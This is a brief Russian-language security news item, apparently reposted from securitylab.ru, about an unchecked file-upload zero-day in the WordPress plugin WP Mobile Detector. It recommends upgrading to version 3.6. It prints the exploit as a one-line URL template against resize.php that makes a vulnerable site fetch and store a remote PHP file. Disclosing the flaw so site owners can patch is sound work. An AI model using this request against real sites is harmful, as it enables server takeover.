Уязвимость нулевого дня в популярном плагине WP Mobile Detector позволяет злоумышленнику загрузить и выполнить произвольный PHP файл на целевой системе.
По статистике на сайте WordPress, данный плагин насчитывает более 10 000 активных установок.
Первые атаки на сайты датируются 29 мая этого года. Уязвимость заключается в отсутствии каких-либо проверок во время загрузки файла. Удаленный пользователь может отправить HTTP POST или HTTP GET запрос к уязвимому сайту, указав ссылку на вредоносный файл и загрузить его на сервер.
Эксплоит к уязвимости выглядит так:
http://[path to WordPress]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of upload file]
Исправление уже выпущено. Всем, кто использует плагин, рекомендовано в кратчайшие сроки установить последнюю версию плагина 3.6 или выше.
Источник http://www.securitylab.ru/
